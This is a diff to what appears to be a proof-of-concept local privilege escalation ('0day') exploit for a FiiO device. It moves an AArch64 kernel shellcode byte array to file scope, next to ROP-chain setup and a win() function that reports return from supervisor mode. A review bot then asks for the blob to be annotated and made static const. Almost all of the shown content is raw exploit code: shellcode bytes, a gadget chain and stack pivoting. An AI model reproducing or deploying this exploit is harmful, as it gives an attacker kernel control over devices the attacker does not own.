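--- a/fiio_LPE_0day/poc.c
+++ b/fiio_LPE_0day/poc.c
@@ -17,11 +17,39 @@
 uint64_t nop = 0xd503201fd503201f;
 uint64_t junk = 0x4242424242424242;
 
+unsigned char shellcode[] = {
+ 0x02, 0xf9, 0x98, 0xd2, 0x42, 0x18, 0xa0, 0xf2,
+ 0x02, 0xf8, 0xdf, 0xf2, 0xe2, 0xff, 0xff, 0xf2,
+ 0xe3, 0x05, 0x80, 0x52, 0x43, 0x00, 0x00, 0x39,
+ 0x83, 0x0c, 0x80, 0x52, 0x43, 0x04, 0x00, 0x39,
+ 0x23, 0x0c, 0x80, 0x52, 0x43, 0x08, 0x00, 0x39,
+ 0x83, 0x0e, 0x80, 0x52, 0x43, 0x0c, 0x00, 0x39,
+ 0x23, 0x0c, 0x80, 0x52, 0x43, 0x10, 0x00, 0x39,
+ 0xe3, 0x05, 0x80, 0x52, 0x43, 0x14, 0x00, 0x39,
+ 0x83, 0x0d, 0x80, 0x52, 0x43, 0x18, 0x00, 0x39,
+ 0xe3, 0x0d, 0x80, 0x52, 0x43, 0x1c, 0x00, 0x39,
+ 0x63, 0x0c, 0x80, 0x52, 0x43, 0x20, 0x00, 0x39,
+ 0x23, 0x0c, 0x80, 0x52, 0x43, 0x24, 0x00, 0x39,
+ 0x83, 0x0d, 0x80, 0x52, 0x43, 0x28, 0x00, 0x39,
+ 0xe3, 0x05, 0x80, 0x52, 0x43, 0x2c, 0x00, 0x39,
+ 0x83, 0x0e, 0x80, 0x52, 0x43, 0x30, 0x00, 0x39,
+ 0xa3, 0x0d, 0x80, 0x52, 0x43, 0x34, 0x00, 0x39,
+ 0x03, 0x0e, 0x80, 0x52, 0x43, 0x38, 0x00, 0x39,
+ 0xe3, 0x05, 0x80, 0x52, 0x43, 0x3c, 0x00, 0x39,
+ 0x63, 0x0c, 0x80, 0x52, 0x43, 0x40, 0x00, 0x39,
+ 0xa3, 0x0d, 0x80, 0x52, 0x43, 0x44, 0x00, 0x39,
+ 0x83, 0x0c, 0x80, 0x52, 0x43, 0x48, 0x00, 0x39,
+ 0xe3, 0x03, 0x1f, 0xaa, 0x43, 0x30, 0x01, 0xf8,
+ 0xa2, 0x02, 0x02, 0xd1, 0x41, 0x00, 0x40, 0xf9,
+ 0x44, 0x04, 0x40, 0xf9, 0xe0, 0x03, 0x1f, 0xaa,
+ 0x04, 0x41, 0x18, 0xd5, 0x21, 0x40, 0x18, 0xd5,
+ 0x00, 0x40, 0x18, 0xd5, 0xe0, 0x03, 0x9f, 0xd6,
+};
+
 static int win() {
  puts("[+] Returned from supervisor mode\n");
  return 0;
 }
- 
  
 static int exploit() {
  int fd;
@@ -38,37 +66,6 @@
  }
  
  void *stack_top = (void *)((uint64_t)stack_base + stack_size);
- 
- 
- unsigned char shellcode[] = {
- 0x02, 0xf9, 0x98, 0xd2, 0x42, 0x18, 0xa0, 0xf2,
- 0x02, 0xf8, 0xdf, 0xf2, 0xe2, 0xff, 0xff, 0xf2,
- 0xe3, 0x05, 0x80, 0x52, 0x43, 0x00, 0x00, 0x39,
- 0x83, 0x0c, 0x80, 0x52, 0x43, 0x04, 0x00, 0x39,
- 0x23, 0x0c, 0x80, 0x52, 0x43, 0x08, 0x00, 0x39,
- 0x83, 0x0e, 0x80, 0x52, 0x43, 0x0c, 0x00, 0x39,
- 0x23, 0x0c, 0x80, 0x52, 0x43, 0x10, 0x00, 0x39,
- 0xe3, 0x05, 0x80, 0x52, 0x43, 0x14, 0x00, 0x39,
- 0x83, 0x0d, 0x80, 0x52, 0x43, 0x18, 0x00, 0x39,
- 0xe3, 0x0d, 0x80, 0x52, 0x43, 0x1c, 0x00, 0x39,
- 0x63, 0x0c, 0x80, 0x52, 0x43, 0x20, 0x00, 0x39,
- 0x23, 0x0c, 0x80, 0x52, 0x43, 0x24, 0x00, 0x39,
- 0x83, 0x0d, 0x80, 0x52, 0x43, 0x28, 0x00, 0x39,
- 0xe3, 0x05, 0x80, 0x52, 0x43, 0x2c, 0x00, 0x39,
- 0x83, 0x0e, 0x80, 0x52, 0x43, 0x30, 0x00, 0x39,
- 0xa3, 0x0d, 0x80, 0x52, 0x43, 0x34, 0x00, 0x39,
- 0x03, 0x0e, 0x80, 0x52, 0x43, 0x38, 0x00, 0x39,
- 0xe3, 0x05, 0x80, 0x52, 0x43, 0x3c, 0x00, 0x39,
- 0x63, 0x0c, 0x80, 0x52, 0x43, 0x40, 0x00, 0x39,
- 0xa3, 0x0d, 0x80, 0x52, 0x43, 0x44, 0x00, 0x39,
- 0x83, 0x0c, 0x80, 0x52, 0x43, 0x48, 0x00, 0x39,
- 0xe3, 0x03, 0x1f, 0xaa, 0x43, 0x30, 0x01, 0xf8,
- 0xa2, 0x02, 0x02, 0xd1, 0x41, 0x00, 0x40, 0xf9,
- 0x44, 0x04, 0x40, 0xf9, 0xe0, 0x03, 0x1f, 0xaa,
- 0x04, 0x41, 0x18, 0xd5, 0x21, 0x40, 0x18, 0xd5,
- 0x00, 0x40, 0x18, 0xd5, 0xe0, 0x03, 0x9f, 0xd6,
- };
-
  
  uint64_t *chain = (uint64_t *)&buf[1024];
  *chain++ = (uint64_t)blr_x21;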
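Review bot: The `shellcode` array now sits at file scope as an unannotated byte blob, so anyone auditing this PoC or reproducing it on a test device cannot tell what it executes in supervisor mode without disassembling it first. I would put a header comment directly above the definition, along the lines of `/* AArch64 machine code assembled from <payload source file — not shown on this page>; states what kernel state it changes and how to restore it */`, and keep the assembly source in the repository next to poc.c so the bytes can be regenerated and compared. Since the array is now a global, `static const unsigned char shellcode[] = {` would also keep it out of the external namespace, matching `static int win()`; this assumes nothing writes to the array, which cannot be confirmed because its use sites are in the skipped lines of `exploit()`.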